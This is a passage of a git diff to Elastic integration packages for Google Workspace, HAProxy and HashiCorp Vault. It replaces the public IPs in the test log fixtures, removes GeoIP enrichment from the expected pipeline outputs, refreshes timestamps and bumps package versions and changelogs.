"Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912664600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}", + "ingested": "2021-12-09T13:39:18.537568300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}", "provider": "user_accounts", "action": "password_edit", "id": "1", @@ -244,7 +190,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -263,35 +209,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912665600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}", + "ingested": "2021-12-09T13:39:18.537572800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}", "provider": "user_accounts", "action": "recovery_email_edit", "id": "1", @@ -322,7 +250,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -341,35 +269,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912666500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}", + "ingested": "2021-12-09T13:39:18.537577900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}", "provider": "user_accounts", "action": "recovery_phone_edit", "id": "1", @@ -400,7 +310,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -419,35 +329,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912667500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}", + "ingested": "2021-12-09T13:39:18.537583700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}", "provider": "user_accounts", "action": "recovery_secret_qa_edit", "id": "1", @@ -478,7 +370,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -497,35 +389,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912668600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}", + "ingested": "2021-12-09T13:39:18.537589400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}", "provider": "user_accounts", "action": "titanium_enroll", "id": "1", @@ -556,7 +430,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -575,35 +449,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912669600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}", + "ingested": "2021-12-09T13:39:18.537595200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}", "provider": "user_accounts", "action": "titanium_unenroll", "id": "1", diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml index 73f5a19ff7b..6491dcaab1b 100644 --- a/packages/google_workspace/manifest.yml +++ b/packages/google_workspace/manifest.yml @@ -1,6 +1,6 @@ name: google_workspace title: Google Workspace Audit Reports -version: 1.2.0 +version: 1.2.1 release: ga description: Collect audit reports from Google Workspaces with Elastic Agent. type: integration diff --git a/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log b/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log index ad3550d19c9..bbf39a3ea6b 100644 --- a/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log +++ b/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log @@ -1 +1 @@ -Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1" +Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1" diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml index be2e70f4e70..7d6139fa5f7 100644 --- a/packages/haproxy/changelog.yml +++ b/packages/haproxy/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.0" changes: - description: Release HAProxy as GA diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log index 7931d2387e2..295abdc03f5 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log @@ -1 +1 @@ -Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP) +Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP) diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json index 73e9e269503..196da4600dc 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json @@ -11,39 +11,27 @@ }, "related": { "ip": [ - "1.2.3.4", - "1.2.3.4" + "67.43.156.13", + "67.43.156.13" ] }, "haproxy": { "mode": "HTTP", "frontend_name": "main", - "source": "1.2.3.4" + "source": "67.43.156.13" }, "destination": { "port": 5000, - "ip": "1.2.3.4" + "ip": "67.43.156.13" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", - "location": { - "lon": 37.6172, - "lat": 55.7527 - } - }, - "address": "1.2.3.4", "port": 40780, - "ip": "1.2.3.4" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T11:10:20.374319400Z", - "original": "Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP)", + "ingested": "2021-12-09T13:39:28.354415600Z", + "original": "Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP)", "category": [ "web", "network" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log index e65e83b08e6..f92fb6760f0 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log @@ -1,2 +1,2 @@ -Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1" +Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1" May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 "OPTIONS /api/v2/app/ HTTP/1.1" \ No newline at end of file diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json index b907607aede..a31e3387c80 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json @@ -7,21 +7,9 @@ }, "temp": {}, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", - "location": { - "lon": 37.6172, - "lat": 55.7527 - } - }, - "address": "1.2.3.4", "port": 38862, - "ip": "1.2.3.4" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/component---src-pages-index-js-4b15624544f97cf0bb8f.js", @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "1.2.3.4" + "67.43.156.13" ] }, "haproxy": { @@ -85,8 +73,8 @@ }, "event": { "duration": 2000000, - "ingested": "2021-06-09T11:10:20.562222600Z", - "original": "Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"", + "ingested": "2021-12-09T13:39:28.437354700Z", + "original": "Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"", "category": [ "web" ], @@ -158,7 +146,7 @@ }, "event": { "duration": 18000000, - "ingested": "2021-06-09T11:10:20.562273Z", + "ingested": "2021-12-09T13:39:28.437363200Z", "original": "May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 \"OPTIONS /api/v2/app/ HTTP/1.1\"", "category": [ "web" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json index 1701464baaa..45cd17e2ffa 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json @@ -68,7 +68,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:10:20.625764100Z", + "ingested": "2021-12-09T13:39:28.671159700Z", "original": "Dec 10 12:01:46 voyager haproxy[19312]: 127.0.0.1:35982 [10/Dec/2018:12:01:46.395] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 \"GET / HTTP/1.1\"", "category": [ "web" @@ -145,7 +145,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:10:20.625812300Z", + "ingested": "2021-12-09T13:39:28.671164Z", "original": "Dec 10 15:46:49 voyager haproxy[29785]: 127.0.0.1:43738 [10/Dec/2018:15:46:49.497] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} \"GET /foo HTTP/1.1\"", "category": [ "web" @@ -226,7 +226,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:10:20.625821Z", + "ingested": "2021-12-09T13:39:28.671167600Z", "original": "Dec 10 15:48:56 voyager haproxy[7873]: 127.0.0.1:44542 [10/Dec/2018:15:48:56.017] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} {|} \"GET /foo HTTP/1.1\"", "category": [ "web" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json index 9562f5ca0af..9804f966f39 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json @@ -41,7 +41,7 @@ }, "event": { "duration": 1000000, - "ingested": "2021-06-09T11:10:20.709375400Z", + "ingested": "2021-12-09T13:39:29.001644200Z", "original": "Sep 20 15:44:23 127.0.0.1 haproxy[25457]: 127.0.0.1:40962 [20/Sep/2018:15:44:23.285] main app/\u003cNOSRV\u003e -1/-1/1 212 SC 1/1/0/0/0 0/0", "kind": "event" }, diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml index ff078988b51..8fba23061e5 100644 --- a/packages/haproxy/manifest.yml +++ b/packages/haproxy/manifest.yml @@ -1,6 +1,6 @@ name: haproxy title: HAProxy -version: 1.0.0 +version: 1.0.1 description: Collect logs and metrics from HAProxy servers with Elastic Agent. type: integration icons: diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml index e9824ce8b02..1c02934b57b 100644 --- a/packages/hashicorp_vault/changelog.yml +++ b/packages/hashicorp_vault/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log index 0d37f9fb2b0..1c765ee7c83 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log @@ -1,5 +1,5 @@ -{"time":"2020-12-01T20:29:04.356625452Z","type":"request","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"156.33.241.5"}} -{"time":"2020-12-01T20:29:04.36089379Z","type":"response","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"156.33.241.5"},"response":{"mount_type":"system","data":{"capabilities":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"],"secret/metadata/apps/github-runner/ca-cert":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"]}}} +{"time":"2020-12-01T20:29:04.356625452Z","type":"request","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"67.43.156.13"}} +{"time":"2020-12-01T20:29:04.36089379Z","type":"response","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"67.43.156.13"},"response":{"mount_type":"system","data":{"capabilities":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"],"secret/metadata/apps/github-runner/ca-cert":["hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367","hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a","hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176","hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2","hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb"]}}} {"time":"2021-07-19T17:19:00.673898225Z","type":"request","auth":{"token_type":"default"},"request":{"id":"24ac580b-805a-d9ee-4d0d-7046932f4e05","operation":"update","mount_type":"pki","client_token":"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23","namespace":{"id":"root"},"path":"internal-ca/issue/internal-server","data":{"alt_names":"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee","common_name":"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c","ip_sans":"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2"},"remote_address":"10.6.8.34"},"error":"permission denied"} {"time":"2021-07-19T17:19:00.674663552Z","type":"response","auth":{"token_type":"default"},"request":{"id":"24ac580b-805a-d9ee-4d0d-7046932f4e05","operation":"update","mount_type":"pki","client_token":"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23","namespace":{"id":"root"},"path":"internal-ca/issue/internal-server","data":{"alt_names":"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee","common_name":"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c","ip_sans":"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2"},"remote_address":"10.6.8.34"},"response":{"mount_type":"pki","data":{"error":"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa"}},"error":"1 error occurred:\n\t* permission denied\n\n"} 